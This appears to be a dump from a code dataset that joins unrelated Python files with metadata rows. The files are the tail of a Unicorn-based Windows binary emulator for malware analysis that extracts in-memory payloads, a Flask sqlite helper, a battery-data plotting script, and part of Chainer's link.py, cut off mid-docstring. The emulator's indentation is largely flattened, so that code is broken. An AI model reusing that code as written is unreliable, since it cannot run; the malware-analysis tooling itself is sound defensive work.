self.extracts['hmemory_' + hex(vmem.data_address)] = content
print('======= Extracted Payloads =======')
if len(self.extracts) == 0:
print('Nothing found')
return
dirname = './' + self.shortname + '_emu'
if not os.path.exists(dirname):
os.makedirs(dirname)
counter = 0
for entry in self.extracts:
name = entry[1:]
options = ''
data = self.extracts[entry]
            if len(str(data)) > 50:
                sdata = str(data)[:25] + '[...]' + str(data)[-9:]
            else:
                sdata = str(data)
            if data[:2] == b'MZ' or data[:2] == 'MZ':
                options = ' (PE payload detected)'
            print('Name="' + name + '" Content="' + sdata + '"' + options)
            fname = name.split('\\')[-1]
            if fname == '':
                fname = 'generic_extract_' + str(counter) + '.bin'
                counter += 1
            with open(dirname + '/' + fname, 'wb') as f:
                f.write(data)
def read_dynamic_imports(self):
print('========= Dynamic Imports =======')
if len(self.dynamics) == 0x0:
            print('No dynamic imports were detected during the emulation')
for i in self.dynamics:
print('Address=', i[0], ' Name=', i[1])
def read_full_regs(self):
print('=== Registers Dump ===')
print('EAX: 0x%08x | EBP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EAX), self.uc.reg_read(UC_X86_REG_EBP)))
print('EBX: 0x%08x | ESP: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EBX), self.uc.reg_read(UC_X86_REG_ESP)))
print('ECX: 0x%08x | ESI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_ECX), self.uc.reg_read(UC_X86_REG_ESI)))
print('EDX: 0x%08x | EDI: 0x%08x' % (self.uc.reg_read(UC_X86_REG_EDX), self.uc.reg_read(UC_X86_REG_EDI)))
print('EIP: 0x%08x ' % self.uc.reg_read(UC_X86_REG_EIP))
def extract_API_args(self, api_name):
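        # The reference file is assumed to store one API per line as
        # "Name;Description;arg1, arg2, ...", e.g. (illustrative entry, not
        # copied from the real API_refs file):
        #   CreateFileA;Creates or opens a file;lpFileName, dwDesiredAccess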
with open(API_refs) as f:
line = next((l for l in f if api_name == l.split(';')[0]), None)
        if line is None or line == '':
            return False, '', '', 0
        description = line.split(';')[1]
        args = line.split(';')[2]
        args_count = args.count(',') + 1
        if args_count == 1 and args.replace('\n', '').replace(' ', '') == '':
            args_count = 0
        if args == '' or args is None:
            # No argument list is available for this API
            return True, description, '', 0
return True, description, args, args_count
def generate_Import_Address_Table(self):
self.IAT = {}
self.raw_IAT = {}
dll_count = 0
functions_count = 0
for entry in self.pe.DIRECTORY_ENTRY_IMPORT:
functions = {}
dll_count += 1
for imp in entry.imports:
functions_count += 1
functions[hex(imp.address)] = imp.name.decode()
self.raw_IAT[hex(imp.address)] = imp.name.decode()
self.IAT[entry.dll.lower().decode()] = functions
self.IAT['dynamic_import'] = {'0x00ff0000': 'placeholder_dynamic_import'}
if self.debug:
            print('[DEBUG] ' + str(functions_count) + ' functions imported in the IAT from ' + str(dll_count) + ' DLLs')
def hook_Import_Address_Table(self):
self.IAT_hook = {}
cnt = 0
for dll in self.IAT:
if dll == 'dynamic_import':
continue
for entry_addr in self.IAT[dll]:
entry = self.IAT[dll][entry_addr]
                content = self.uc.mem_read(int(entry_addr, 16), 0x4)
                # Hex string of the DWORD stored in the IAT slot (little-endian)
                value = '0x%08x' % struct.unpack('<I', bytes(content))[0]
self.IAT_hook[entry] = value
cnt += 1
if self.debug:
print('[DEBUG] ' + str(cnt) + ' IAT entry where hooked')
def generate_Thread_Information_Block(self):
self.TEB_base_addr = 0x200000
self.process_ID = 0x1908
self.thread_ID = 0x10C
self.PEB_base_addr = self.TEB_base_addr + 0x1000
        TEB = b''
        TEB += struct.pack("<I", 0xffffffff)                           # SEH frame (end of chain)
        TEB += struct.pack("<I", (self.stack_addr + self.stack_size))  # Stack base (top)
        TEB += struct.pack("<I", self.stack_addr)                      # Stack limit (bottom)
        TEB += struct.pack("<I", 0x0)                                  # SubSystemTib
        TEB += struct.pack("<I", 0x0)                                  # FiberData
        TEB += struct.pack("<I", 0x0)                                  # ArbitraryUserPointer
        TEB += struct.pack("<I", self.TEB_base_addr)                   # Self pointer (linear TEB address)
        TEB += struct.pack("<I", 0x0)                                  # EnvironmentPointer
        TEB += struct.pack("<I", self.process_ID)                      # ClientId: process ID
        TEB += struct.pack("<I", self.thread_ID)                       # ClientId: thread ID
        TEB += struct.pack("<I", 0x0)                                  # ActiveRpcHandle
        TEB += struct.pack("<I", 0x0)                                  # Thread-local storage pointer
        TEB += struct.pack("<I", self.PEB_base_addr)                   # PEB pointer
        page_size = 4096
        # Round the mapping size up to the next page boundary
        aligned_size = (0x5000 + page_size - 1) & ~(page_size - 1)
self.uc.mem_map(self.TEB_base_addr, aligned_size)
self.uc.mem_write(self.TEB_base_addr, TEB)
def launch(self):
self.header_image_base = self.pe.OPTIONAL_HEADER.ImageBase
self.header_size_of_image = self.pe.OPTIONAL_HEADER.SizeOfImage
self.header_entrypoint = self.pe.OPTIONAL_HEADER.AddressOfEntryPoint
self.mapped_image = self.pe.get_memory_mapped_image(ImageBase=self.header_image_base)
self.mapped_size = (len(self.mapped_image) + 0x1000) & ~0xFFF
self.exit_addr = 0xfffff000
        if self.out is not None:
            sys.stdout = open(self.out, "w")
self.uc.mem_map(self.header_image_base, self.mapped_size)
self.uc.mem_write(self.header_image_base, self.mapped_image)
self.start_addr = self.header_entrypoint + self.header_image_base
if self.debug:
print('[DEBUG] Binary mapped in memory at 0x%08x' % self.header_image_base)
self.stack_addr = 0x0
self.stack_size = 0x200000
self.uc.mem_map(self.stack_addr, self.stack_size)
if self.debug:
print('[DEBUG] Stack of 0x%x bytes starting at 0x%08x' % (self.stack_size, self.stack_addr))
self.uc.reg_write(UC_X86_REG_ESP, self.stack_addr + self.stack_size - 0x500)
self.uc.reg_write(UC_X86_REG_EBP, self.stack_addr + self.stack_size - 0x100)
        if self.debug:
            print('[DEBUG] Initial stack frame created between 0x%08x and 0x%08x' % (self.stack_addr + self.stack_size - 0x500, self.stack_addr + self.stack_size - 0x100))
self.generate_Thread_Information_Block()
if self.debug:
print('[DEBUG] Thread Information Block initiated at 0x%08x' % self.TEB_base_addr)
self.generate_Import_Address_Table()
self.hook_Import_Address_Table()
self.uc.reg_write(UC_X86_REG_EDI, self.start_addr)
self.uc.reg_write(UC_X86_REG_ESI, self.start_addr)
self.uc.reg_write(UC_X86_REG_EDX, self.start_addr)
self.uc.reg_write(UC_X86_REG_ECX, self.start_addr)
self.uc.reg_write(UC_X86_REG_EBX, self.PEB_base_addr)
self.uc.reg_write(UC_X86_REG_EAX, self.TEB_base_addr)
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
print('[DEBUG] Starting the emulation of "%s.exe" from 0x%08x' % (self.drivename, self.start_addr))
print()
self.uc.emu_start(self.start_addr, self.start_addr + 500000, timeout=20 * UC_SECOND_SCALE)
print()
if len(self.threads) != 0:
uniq_threads = list(dict.fromkeys(self.threads))
else:
uniq_threads = False
if self.debug:
print('[!] Looking for entrypoints in the threads queue')
if uniq_threads:
for thread_addr in uniq_threads:
print('[!] Starting the thread ' + hex(thread_addr))
self.execution_mode = 'thread'
self.uc.hook_add(UC_HOOK_CODE, self.hook_code)
self.uc.emu_start(thread_addr, self.start_addr + 100, timeout=20 * UC_SECOND_SCALE)
print('[!] End of the thread ' + hex(thread_addr))
self.thread_trace = []
print()
final_esp = self.uc.reg_read(UC_X86_REG_ESP)
final_ebp = self.uc.reg_read(UC_X86_REG_EBP)
if args.dynamics:
self.read_dynamic_imports()
print()
if self.stack:
self.read_stack(final_esp, final_ebp - final_esp)
print()
if self.registers:
self.read_full_regs()
print()
if self.handle_list:
self.read_handle()
print()
if self.show_extract:
self.display_extracts()
print()
if self.trace:
print('==== Call trace ====')
print(' → Entrypoint')
for elem in self.calltrace:
print(' → ' + elem)
        if self.out is not None:
            sys.stdout.close()
def main(args):
emul = Environment(args)
emul.launch()
parser = argparse.ArgumentParser(description='Windows Binary Emulator')
parser.add_argument('-p', '--path', required=True, help='path to the binary file to emulate')
parser.add_argument('-b', '--breakpoint', required=False, help='pause the execution at the given address')
parser.add_argument('--trace', required=False, action="store_true", help='display the call trace of the binary')
parser.add_argument('--dump', required=False, action="store_true", help='display a full dump of the program\'s state after the execution')
parser.add_argument('--stack', required=False, action="store_true", help='display a dump of the stack after the execution')
parser.add_argument('--registers', required=False, action="store_true", help='display a dump of the registers after the execution')
parser.add_argument('--debug', required=False, action="store_true", help='display debug messages')
parser.add_argument('--silent', required=False, action="store_true", help='only print out the system calls')
parser.add_argument('--handle', required=False, action="store_true", help='display the list of used handles')
parser.add_argument('--extract', required=False, action="store_true", help='extract potential payloads found in memory. Files are saved to <bin_name>_emu/')
parser.add_argument('--imports', required=False, action="store_true", help='UNIMPLEMENTED - display the static content of the import address table (IAT)')
parser.add_argument('--dynamics', required=False, action="store_true", help='display the list of dynamically resolved syscalls')
parser.add_argument('--out', required=False, help='save the emulation output to a file')
if __name__ == '__main__':
    args = parser.parse_args()
    main(args)
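# Illustrative invocation (the script file name is an assumption):
#   python emulator.py -p sample.exe --trace --extract --out report.txt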
| true
| true
|
f70b3a6a57e971fa38748f6fcdeb53521d3f0eda
| 535
|
py
|
Python
|
db_helpers.py
|
crisb0/final3011
|
8110b01edf17a4787d19ac8083ac4542381880b8
|
[
"MIT"
] | null | null | null |
db_helpers.py
|
crisb0/final3011
|
8110b01edf17a4787d19ac8083ac4542381880b8
|
[
"MIT"
] | null | null | null |
db_helpers.py
|
crisb0/final3011
|
8110b01edf17a4787d19ac8083ac4542381880b8
|
[
"MIT"
] | 1
|
2018-09-25T03:52:04.000Z
|
2018-09-25T03:52:04.000Z
|
import sqlite3
from app import app
from flask import g
DATABASE = 'db/trackpants.db'
def get_db():
db = getattr(g, '_database', None)
if db is None:
db = g._database = sqlite3.connect(DATABASE)
return db
@app.teardown_appcontext
def close_db(exception):
db = getattr(g, '_database', None)
if db is not None:
db.close()
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
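# Illustrative usage inside a request handler (the `users` table is an
# assumption, not part of this module):
#   user = query_db('select * from users where username = ?', (name,), one=True)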
| 21.4
| 52
| 0.639252
| true
| true
|
f70b3c27a05fab17b36c2b9e4c733ddb6b814531
| 2,463
|
py
|
Python
|
example/Python_Plot/Battery example/ee_0120_Y_consist.py
|
Mic-Tsai/Power-Consumption-Current-Sense-System-V22
|
7fe8348171efe53a2985a591ef7cf657bacc5fbd
|
[
"MIT"
] | 1
|
2020-08-19T02:30:42.000Z
|
2020-08-19T02:30:42.000Z
|
example/Python_Plot/Battery example/ee_0120_Y_consist.py
|
Mic-Tsai/Power-Consumption-Current-Sense-System-V22
|
7fe8348171efe53a2985a591ef7cf657bacc5fbd
|
[
"MIT"
] | null | null | null |
example/Python_Plot/Battery example/ee_0120_Y_consist.py
|
Mic-Tsai/Power-Consumption-Current-Sense-System-V22
|
7fe8348171efe53a2985a591ef7cf657bacc5fbd
|
[
"MIT"
] | null | null | null |
import re, sys
import matplotlib.pyplot as plt
import numpy as np
path = ''
flname = sys.argv[1]
try:
    chartType = sys.argv[2]
except IndexError:
    chartType = 'ch1_vload'
print('chartType:'+chartType)
fl = flname.split('/')
for i in fl[:-1]:
path = path+i+'/'
with open(flname, 'r') as fw:
    rawdata = fw.read().strip()
ch1_list = []
ch2_list = []
ch1_vload = []
ch1_volt = []
ch1_iload = []
ch1_pload = []
ch2_vload = []
ch2_volt = []
ch2_iload = []
ch2_pload = []
unit = ''
line = rawdata.split('\n')
for aline in line:
tmp = aline.split('||')
ch1_list.append(tmp[0].lstrip())
ch2_list.append(tmp[2].lstrip())
for item in ch1_list:
    tmp = item.split(' | ')
    for sub in tmp:
        if sub.count("V-load"):
            ch1_vload.append(float(re.search(r'\d+\.\d+', sub).group()))
        elif sub.count("Voltage"):
            ch1_volt.append(float(re.search(r'\d+\.\d+', sub).group()))
        elif sub.count("I-load"):
            ch1_iload.append(float(re.search(r'\d+\.\d+', sub).group()))
        elif sub.count("P-load"):
            ch1_pload.append(float(re.search(r'\d+\.\d+', sub).group()))
for item in ch2_list:
    tmp = item.split(' | ')
    for sub in tmp:
        if sub.count("V-load"):
            ch2_vload.append(float(re.search(r'\d+\.\d+', sub).group()))
        elif sub.count("Voltage"):
            ch2_volt.append(float(re.search(r'\d+\.\d+', sub).group()))
        elif sub.count("I-load"):
            ch2_iload.append(float(re.search(r'\d+\.\d+', sub).group()))
        elif sub.count("P-load"):
            ch2_pload.append(float(re.search(r'\d+\.\d+', sub).group()))
if chartType.lower().count('vload') or chartType.lower().count('v-load'):
print('**vload')
unit = 'V'
if chartType.lower().count('ch1'):
y = ch1_vload
else:
y = ch2_vload
elif chartType.lower().count('volt'):
print('**volt')
unit = 'mV'
if chartType.lower().count('ch1'):
y = ch1_volt
else:
y = ch2_volt
elif chartType.lower().count('iload') or chartType.lower().count('i-load'):
print('**iload')
unit = 'mA'
if chartType.lower().count('ch1'):
y = ch1_iload
else:
y = ch2_iload
elif chartType.lower().count('pload') or chartType.lower().count('p-load'):
    print('**pload')
    unit = 'mW'
    if chartType.lower().count('ch1'):
        y = ch1_pload
    else:
        y = ch2_pload
else:
    # Unknown chart type: fail early instead of hitting a NameError on `y`
    print('Unknown chartType: ' + chartType)
    sys.exit(1)
x = np.linspace(1,len(y),len(y))
fig = plt.figure(1)
ax = plt.axes()
plt.xlim([0, len(y)])
plt.ylim([0,160])
plt.plot(x,y,ls='-',c='b')
plt.grid('on')
plt.title(chartType)
plt.ylabel('['+unit+']')
plt.savefig(path+chartType+'.png')
print("File Path:"+path+chartType+'.png')
| 21.417391
| 75
| 0.624036
| true
| true
|
f70b3cd7485a9d19d3382154bde58d1928fe6a52
| 45,421
|
py
|
Python
|
chainer/link.py
|
lazykyama/chainer
|
d4965bbf53af9e1b74b9b8a518f92c751f652a33
|
[
"MIT"
] | 1
|
2019-09-04T15:15:43.000Z
|
2019-09-04T15:15:43.000Z
|
chainer/link.py
|
dr4mohamed/chainer
|
6fa28004889b260ae13484f17dc1ac68b25d52bb
|
[
"MIT"
] | null | null | null |
chainer/link.py
|
dr4mohamed/chainer
|
6fa28004889b260ae13484f17dc1ac68b25d52bb
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
import collections
import contextlib
import copy
import typing as tp # NOQA
import warnings
import numpy
import six
import chainer
from chainer import backend
from chainer.backends import cuda
from chainer import device_resident
from chainer import initializers
from chainer import link_hook
from chainer import types # NOQA
from chainer.utils import collections_abc
from chainer import variable
def _is_shape(value):
# type: (tp.Optional[tp.Any]) -> bool
if value is None:
return True
elif isinstance(value, collections_abc.Sequence):
try:
return all(int(x) for x in value)
except TypeError:
return False
try:
int(value) # try to cast
return True
except TypeError:
return False
def _ensure_shape_dtype(value):
# type: (tp.Optional[tp.Any]) -> tp.Tuple[tp.Optional[types.ShapeSpec], types.DTypeSpec] # NOQA
# Return value paired with dtype FP32 if it is a shape.
if _is_shape(value):
return value, numpy.float32
# Otherwise, returns it with assuming a shape-dtype pair.
else:
return value # type: ignore
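# Illustrative behaviour of the helpers above (not part of the upstream source):
#   _ensure_shape_dtype((3, 4))                    -> ((3, 4), numpy.float32)
#   _ensure_shape_dtype(((3, 4), numpy.float16))   -> ((3, 4), numpy.float16)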
class Link(device_resident.DeviceResident):
"""Building block of model definitions.
Link is a building block of neural network models that support various
features like handling parameters, defining network fragments,
serialization, etc.
Link is the primitive structure for the model definitions. It supports
management of parameter variables and *persistent values* that should be
incorporated to serialization.
Parameter is an instance of :class:`~chainer.Parameter` registered to a
link. A :class:`~chainer.Parameter` object can be registered as a
parameter of the link by assigning it to an attribute within *an
initialization scope*, which is a code surrounded by a
:meth:`init_scope` context manager using the ``with`` statement.
Persistent values are arrays, scalars, or any other serializable values
registered via :meth:`register_persistent` or :meth:`add_persistent`.
.. note::
Whereas arbitrary serializable objects can be registered as persistent
values, it is strongly recommended that you just register values that
should be treated as results of learning. A typical example of
persistent values is ones computed during training and required for
testing, e.g. running statistics for batch normalization.
Parameters and persistent values are referred by their names. They can be
accessed as attributes of the links. Link class itself manages the lists
of names of parameters and persistent values to distinguish parameters and
persistent values from other attributes.
Link can be composed into more complex models. This composition feature is
supported by child classes like :class:`Chain` and :class:`ChainList`. One
can create a chain by combining one or more links. See the documents for
these classes for details.
As noted above, Link supports the serialization protocol of the
:class:`~chainer.Serializer` class. **Note that only parameters and
persistent values are saved and loaded.** Other attributes are considered
as a part of user program (i.e. a part of network definition). In order to
construct a link from saved file, other attributes must be identically
reconstructed by user codes.
.. admonition:: Example
This is a simple example of custom link definition. Chainer itself also
provides many links defined under the :mod:`~chainer.links` module. They
might serve as examples, too.
Consider we want to define a simple primitive link that implements a
fully-connected layer based on the :func:`~functions.linear` function.
Note that this function takes input units, a weight variable, and a bias
variable as arguments. Then, the fully-connected layer can be defined as
follows::
import chainer
import chainer.functions as F
from chainer import initializers
import numpy as np
class LinearLayer(chainer.Link):
def __init__(self, n_in, n_out):
super(LinearLayer, self).__init__()
with self.init_scope():
self.W = chainer.Parameter(
initializers.Normal(), (n_out, n_in))
self.b = chainer.Parameter(
initializers.Zero(), (n_out,))
def forward(self, x):
return F.linear(x, self.W, self.b)
This example shows that a user can define arbitrary parameters and use
them in any methods. Links typically implement the ``forward``
operator, although they can also provide other methods to implement the
forward propagation.
Args:
params:
Names, shapes, and optional dtypes of initial parameters.
The keywords are used as the parameter names and the corresponding
values consist either of the shape or a tuple of shape and a dtype
``(shape, dtype)``.
If only the shape is supplied, the default dtype will be used.
Attributes:
name (str): Name of this link, given by the parent chain (if exists).
"""
_local_link_hooks = None # type: tp.Optional[collections.OrderedDict[str, chainer.LinkHook]] # NOQA
__init_done = False
def __init__(self, **params):
# type: (**tp.Any) -> None
super(Link, self).__init__()
self._params = set() # type: tp.Set[str]
self._persistent = set() # type: tp.Set[str]
self._within_init_scope = False # type: bool
self.name = None # type: tp.Optional[str]
# This flag has to be set before calling add_param().
self.__init_done = True
for name, value in six.iteritems(params):
shape, dtype = _ensure_shape_dtype(value)
self.add_param(name, shape, dtype=dtype)
def __check_init_done(self):
if not self.__init_done:
raise RuntimeError('Link.__init__() has not been called.')
def __str__(self):
specs = ', '.join(
'{}={}'.format(k, v) for k, v in self.printable_specs
)
return '{cls}({specs})'.format(
cls=self.__class__.__name__, specs=specs,
)
@property
def local_link_hooks(self):
# type: () -> collections.OrderedDict[str, chainer.LinkHook]
"""Ordered dictionary of registered link hooks.
Contrary to ``chainer.thread_local.link_hooks``,
which registers its elements to all functions,
link hooks in this property are specific to this link.
"""
if self._local_link_hooks is None:
self._local_link_hooks = collections.OrderedDict()
return self._local_link_hooks
@property
def _n_local_link_hooks(self):
# type: () -> int
return (0 if self._local_link_hooks is None
else len(self._local_link_hooks))
@property
def _device_id(self):
warnings.warn(
'Link._device_id is left only for backward compatibility and '
'likely to be removed. Use Link.device instead.',
DeprecationWarning)
device = self.device
if device.xp is cuda.cupy:
return device.device.id
return None
@property
def printable_specs(self):
"""Generator of printable specs of this link.
Yields:
specs (tuple of str and object):
Basically, it returns the arguments (pair of keyword and value)
that are passed to the :meth:`__init__`. This pair of key and
value is used for representing this class or subclass with
:meth:`__str__`.
"""
if 0:
yield
@property
def within_init_scope(self):
# type: () -> bool
"""True if the current code is inside of an initialization scope.
See :meth:`init_scope` for the details of the initialization scope.
"""
return getattr(self, '_within_init_scope', False)
@contextlib.contextmanager
def init_scope(self):
# type: () -> tp.Iterator[None]
"""Creates an initialization scope.
This method returns a context manager object that enables registration
of parameters (and links for :class:`~chainer.Chain`) by an assignment.
A :class:`~chainer.Parameter` object can be automatically registered
by assigning it to an attribute under this context manager.
.. admonition:: Example
In most cases, the parameter registration is done in the
initializer method. Using the ``init_scope`` method, we can
simply assign a :class:`~chainer.Parameter` object to register
it to the link.
.. code-block:: python
class MyLink(chainer.Link):
def __init__(self):
super().__init__()
with self.init_scope():
self.W = chainer.Parameter(0, (10, 5))
self.b = chainer.Parameter(0, (5,))
"""
# super().__init__ must be called before init_scope().
self.__check_init_done()
old_flag = self.within_init_scope
self._within_init_scope = True
try:
yield
finally:
self._within_init_scope = old_flag
def __call__(self, *args, **kwargs):
# type: (*tp.Any, **tp.Any) -> tp.Any # NOQA
self.__check_init_done()
# TODO(niboshi): Support link hooks for other forward methods.
hooks = chainer._get_link_hooks()
if self._n_local_link_hooks > 0:
hooks = collections.OrderedDict(hooks)
hooks.update(self.local_link_hooks)
hooks = hooks.values() # avoid six for performance
# Call forward_preprocess hook
if hooks:
pre_cb_args = link_hook._ForwardPreprocessCallbackArgs(
self, 'forward', args, kwargs)
for hook in hooks:
hook.forward_preprocess(pre_cb_args)
# Call the forward function
# (See #5078) super().__call__ is used when the method is injected by a
# mixin class. To keep backward compatibility, the injected one is
# prioritized over forward().
forward = getattr(super(Link, self), '__call__', None)
if forward is None:
# forward is implemented in the child classes
forward = self.forward # type: ignore
out = forward(*args, **kwargs)
# Call forward_postprocess hook
if hooks:
post_cb_args = link_hook._ForwardPostprocessCallbackArgs(
self, 'forward', args, kwargs, out)
for hook in hooks:
hook.forward_postprocess(post_cb_args)
return out
def __setattr__(self, name, value):
# type: (str, tp.Any) -> None
if self.within_init_scope and isinstance(value, variable.Parameter):
value.name = name
self._params.add(name)
self._persistent.discard(name)
super(Link, self).__setattr__(name, value)
def __delattr__(self, name):
# type: (str) -> None
self._params.discard(name)
self._persistent.discard(name)
super(Link, self).__delattr__(name)
def add_param(self, name, shape=None, dtype=numpy.float32,
initializer=None):
# type: (str, tp.Optional[types.ShapeSpec], types.DTypeSpec, tp.Optional[types.InitializerSpec]) -> None # NOQA
"""Registers a parameter to the link.
Args:
name (str): Name of the parameter. This name is also used as the
attribute name.
shape (int or tuple of ints): Shape of the parameter array. If it
is omitted, the parameter variable is left uninitialized.
dtype: Data type of the parameter array.
initializer (:ref:`initializer <initializer>`): If it is not
``None``, the data is initialized with the given initializer.
If it is an array, the data is directly initialized by it. If
it is callable, it is used as a weight initializer. Note that
in these cases, ``dtype`` argument is ignored. It can also be
a scalar, in which case the data array will be filled by this
scalar. Note that float32 is used in this case.
"""
if name in self.__dict__:
raise AttributeError(
'cannot register a new parameter %s: attribute exists'
% name)
if initializer is None:
initializer = initializers.NaN(dtype)
param = variable.Parameter(initializer, shape)
with self.init_scope():
setattr(self, name, param)
def add_persistent(self, name, value):
# type: (str, tp.Any) -> None
"""Registers a persistent value to the link.
The registered value is saved and loaded on serialization and
deserialization. The value is set to an attribute of the link.
Args:
name (str): Name of the persistent value. This name is also used
for the attribute name.
value: Value to be registered.
"""
d = self.__dict__
if name in d:
raise AttributeError(
'cannot register a new persistent value %s: attribute exists'
% name)
self._persistent.add(name)
self._params.discard(name)
d[name] = value
def register_persistent(self, name):
# type: (str) -> None
"""Registers an attribute of a given name as a persistent value.
This is a convenient method to register an existing attribute as a
persistent value. If ``name`` has been already registered as a
parameter, this method removes it from the list of parameter names
and re-registers it as a persistent value.
Args:
name (str): Name of the attribute to be registered.
"""
if not hasattr(self, name):
raise AttributeError(
'cannot register non-existent attribute %s as a persistent '
'value' % name)
self._persistent.add(name)
self._params.discard(name)
def copy(self, mode='share'):
# type: (str) -> 'Link'
"""Copies the link hierarchy to new one.
The whole hierarchy rooted by this link is copied. There are three
modes to perform copy. Please see the documentation for the argument
``mode`` below.
The name of the link is reset on the copy, since the copied instance
does not belong to the original parent chain (even if exists).
Args:
mode (str): It should be either ``init``, ``copy``, or ``share``.
``init`` means parameter variables under the returned link
object is re-initialized by calling their
:meth:`~chainer.Parameter.initialize` method, so that all the
parameters may have different initial values from the original
link.
``copy`` means that the link object is deeply copied, so that
its parameters are not re-initialized but are also deeply
copied. Thus, all parameters have same initial values but can
be changed independently.
``share`` means that the link is shallowly copied, so that its
parameters' arrays are shared with the original one. Thus,
their values are changed synchronously. The default ``mode``
is ``share``.
Returns:
Link: Copied link object.
"""
if mode == 'share':
ret = copy.copy(self)
ret._params = set(self._params)
ret._persistent = set(self._persistent)
ret.name = None
d = ret.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in ret._params:
d[name] = copy.copy(d[name])
d[name].grad = None
return ret
elif mode == 'copy':
return copy.deepcopy(self)
elif mode == 'init':
ret = copy.deepcopy(self)
for param in ret.params(include_uninit=False):
param.initialize(param.shape)
return ret
else:
raise ValueError(
'The \'mode\' argument should be either \'init\','
'\'copy\', or \'share\'. But {} was given.'.format(mode))
def device_resident_accept(self, visitor):
super(Link, self).device_resident_accept(visitor)
d = self.__dict__
for name in self._params:
x = d[name]
visitor.visit_variable(x)
for name in self._persistent:
x = d[name]
if isinstance(x, chainer.get_array_types()):
d[name] = visitor.visit_array(x)
def params(self, include_uninit=True):
# type: (bool) -> tp.Iterator[chainer.Parameter]
"""Returns a generator of all parameters under the link hierarchy.
Args:
include_uninit (bool): If ``True``, it also generates uninitialized
parameters.
Returns:
A generator object that generates all parameters.
"""
d = self.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield d[name]
def namedparams(self, include_uninit=True):
# type: (bool) -> tp.Iterator[tp.Tuple[str, chainer.Parameter]]
"""Returns a generator of all (path, param) pairs under the hierarchy.
Args:
include_uninit (bool): If ``True``, it also generates uninitialized
parameters.
Returns:
A generator object that generates all (path, parameter) pairs. The
paths are relative from this link.
"""
d = self.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in sorted(self._params):
if include_uninit or d[name].data is not None:
yield '/' + name, d[name]
def links(self, skipself=False):
# type: (bool) -> tp.Iterator['Link']
"""Returns a generator of all links under the hierarchy.
Args:
skipself (bool): If ``True``, then the generator skips this link
and starts with the first child link.
Returns:
A generator object that generates all links.
"""
if not skipself:
yield self
def namedlinks(self, skipself=False):
# type: (bool) -> tp.Iterator[tp.Tuple[str, 'Link']]
"""Returns a generator of all (path, link) pairs under the hierarchy.
Args:
skipself (bool): If ``True``, then the generator skips this link
and starts with the first child link.
Returns:
A generator object that generates all (path, link) pairs.
"""
if not skipself:
yield '/', self
def children(self):
# type: () -> tp.Iterator['Link']
"""Returns a generator of all child links.
Returns:
A generator object that generates all child links.
"""
if 0:
yield
def copyparams(self, link, copy_persistent=True):
# type: ('Link', bool) -> None
"""Copies all parameters from given link.
This method copies data arrays of all parameters in the hierarchy. The
copy is even done across the host and devices. Note that this method
does not copy the gradient arrays.
*From v5.0.0:* this method also copies the persistent values (e.g. the
moving statistics of :class:`~chainer.links.BatchNormalization`). If
the persistent value is an ndarray, the elements are copied. Otherwise,
it is copied using :func:`copy.deepcopy`. The old behavior (not copying
persistent values) can be reproduced with ``copy_persistent=False``.
Args:
link (Link): Source link object.
copy_persistent (bool): If ``True``, persistent values are also
copied. ``True`` by default.
"""
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].copydata(src[name])
if copy_persistent:
array_types = chainer.get_array_types()
for name in self._persistent:
d = dst[name]
s = src[name]
if isinstance(d, array_types) and isinstance(s, array_types):
backend.copyto(d, s)
else:
dst[name] = copy.deepcopy(s)
def cleargrads(self):
# type: () -> None
"""Clears all gradient arrays.
This method should be called before the backward computation at every
iteration of the optimization.
"""
for param in self.params():
param.cleargrad()
def zerograds(self):
# type: () -> None
"""Initializes all gradient arrays by zero.
.. deprecated:: v1.15
Use the more efficient :meth:`cleargrads` instead.
"""
warnings.warn(
'Link.zerograds is deprecated. Use Link.cleargrads instead.',
DeprecationWarning)
for param in self.params():
param.zerograd()
def addgrads(self, link):
# type: ('Link') -> None
"""Accumulates gradient values from given link.
This method adds each gradient array of the given link to corresponding
gradient array of this link. The accumulation is even done across
host and different devices.
Args:
link (Link): Source link object.
"""
src = link.__dict__
dst = self.__dict__
for name in self._params:
dst[name].addgrad(src[name])
def enable_update(self):
# type: () -> None
"""Enables update rules of all parameters under the link hierarchy.
This method sets the :attr:`~chainer.UpdateRule.enabled` flag of the
update rule of each parameter variable to ``True``.
"""
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = True
def disable_update(self):
# type: () -> None
"""Disables update rules of all parameters under the link hierarchy.
This method sets the :attr:`~chainer.UpdateRule.enabled` flag of the
update rule of each parameter variable to ``False``.
"""
for param in self.params():
rule = param.update_rule
if rule is not None:
rule.enabled = False
@property
def update_enabled(self):
# type: () -> bool
"""``True`` if at least one parameter has an update rule enabled."""
for param in self.params():
rule = param.update_rule
if rule is not None and rule.enabled:
return True
return False
def serialize(self, serializer):
# type: (chainer.AbstractSerializer) -> None
"""Serializes the link object.
Args:
serializer (~chainer.AbstractSerializer): Serializer object.
"""
d = self.__dict__ # type: tp.Dict[str, chainer.Parameter]
for name in self._params:
param = d[name]
data = serializer(name, param.data) # type: types.NdArray
if param.data is None and data is not None:
# Initialize the parameter here
param.initialize(data.shape)
with chainer.using_device(param.device):
param.data[...] = param.device.send(data)
for name in self._persistent:
d[name] = serializer(name, d[name])
def repeat(self, n_repeat, mode='init'):
# type: (int, str) -> chainer.Sequential
"""Repeats this link multiple times to make a :class:`~chainer.Sequential`.
This method returns a :class:`~chainer.Sequential` object which has
the same :class:`~chainer.Link` multiple times repeatedly. The ``mode``
argument means how to copy this link to repeat.
.. admonition:: Example
You can repeat the same link multiple times to create a longer
:class:`~chainer.Sequential` block like this:
.. testcode::
class ConvBNReLU(chainer.Chain):
def __init__(self):
super(ConvBNReLU, self).__init__()
with self.init_scope():
self.conv = L.Convolution2D(
None, 64, 3, 1, 1, nobias=True)
self.bn = L.BatchNormalization(64)
def forward(self, x):
return F.relu(self.bn(self.conv(x)))
net = ConvBNReLU().repeat(16, mode='init')
The ``net`` object contains 16 blocks, each of which is
``ConvBNReLU``. And the ``mode`` was ``init``, so each block
is re-initialized with different parameters. If you give
``copy`` to this argument, each block has same values for its
parameters but its object ID is different from others. If it is
